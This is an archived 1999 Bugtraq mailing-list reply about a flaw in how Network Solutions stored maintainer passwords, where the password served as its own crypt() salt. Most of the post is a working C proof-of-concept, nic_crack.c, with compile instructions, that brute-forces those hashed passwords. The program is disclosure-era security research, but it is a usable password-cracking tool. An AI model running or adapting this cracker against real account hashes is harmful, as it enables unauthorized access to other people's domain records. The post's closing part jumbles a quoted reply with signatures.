Bugtraq mailing list archives
Re: Insecure handling of NetSol maintainer passwords
From: pedward () WEBCOM COM (pedward () WEBCOM COM)
Date: Wed, 10 Nov 1999 14:49:58 -0800
I couldn't resist doing a proof-of-concept, however I take no responsibility for cracking your own
password. It takes a while to run on fairly standard passwords. Please don't bombard be with
'haX0r d00d' requests, like the Frontpage thing.
--Perry
Compiles on RH6.0 with:
gcc -O -funroll-loops nic_crack nic_crack.c -lcyprt
---------------------------------------------------8<-------------------------------------------------
/* nic_crack.c - brute forces Netsol encrypted NIC update passwords */
#define _XOPEN_SOURCE
#include <stdio.h>
#include <unistd.h>
struct key {
char a[2];
char b, c, d, e, f, g;
char term;
};
int main(int argc, char *argv[])
{
char *passwd;
char *crypted;
struct key thekey;
char first[3];
int b,c,d,e,f,g,i;
if (argc<2) {
fprintf(stderr,"usage: nic_crack <crypted password>\n");
exit(1);
}
passwd = argv[1];
thekey.term = '\0';
strncpy(first, argv[1], 2);
first[2] = 0;
strncpy(thekey.a, argv[1], 2);
for (g = 0; g < 127; g++) {
thekey.g = g;
for (f = 0; f < 127; f++) {
thekey.f = f;
for (e = 0; e < 127; e++) {
thekey.e = e;
for (d = 0; d < 127; d++) {
thekey.d = d;
for (c = 0; c < 127; c++) {
thekey.c = c;
for (b = 0; b < 127; b++) {
thekey.b = b;
crypted = (char *)crypt((char *)&thekey, first);
if (strcmp(crypted, passwd) == 0) {
printf("Found: %s\n", (char *)&thekey);
return 0;
}
}
}
}
}
}
}
return 0;
---------------------------------------------------8<-------------------------------------------------
}
through crypt(), but the first two characters of the encrypted value (the salt) are the same as the first two characters of the password, indicating they use the password as its own salt. This dramatically limits the usefulness of -- Jefferson Ogata <jogata () nodc noaa gov> National Oceanographic Data Center You can't step into the same river twice. -- Herakleitos
-- Perry Harrington Director of zelur xuniL () ................ System Architecture Think Blue. /\
Current thread:
- [w00giving '99 #2] IMAIL POP server, (continued)
- [w00giving '99 #2] IMAIL POP server Shok (Nov 07)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Blue Boar (Nov 07)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Jefferson Ogata (Nov 08)
- MS Outlook alert : Cuartango Active Setup Elias Levy (Nov 08)
- BigIP - bigconf.cgi holes Guy Cohen (Jun 13)
- Re: MS Outlook alert : Cuartango Active Setup David LeBlanc (Nov 08)
- Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Mark (Nov 08)
- Insecure handling of NetSol maintainer passwords jlewis () LEWIS ORG (Nov 08)
- flaw in dmesg under Solaris echo8 (Nov 09)
- Re: Insecure handling of NetSol maintainer passwords Jefferson Ogata (Nov 09)
- Re: Insecure handling of NetSol maintainer passwords pedward () WEBCOM COM (Nov 10)
- Re: Insecure handling of NetSol maintainer passwords Trevor Schroeder (Nov 10)
- networksolutions CRYPT-PW salt (was: Re: Insecure handling of NetSol maintainer passwords) Jefferson Ogata (Nov 10)
- [Cobalt] Security Advisory - cgiwrap Jeff Bilicki (Nov 09)
- Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Andy Helsby (Nov 09)
- Re: FreeBSD 3.3's seyon vulnerability Bill Fumerola (Nov 09)
- Re: IE4/5 "file://" buffer overflow Mikael Olsson (Nov 09)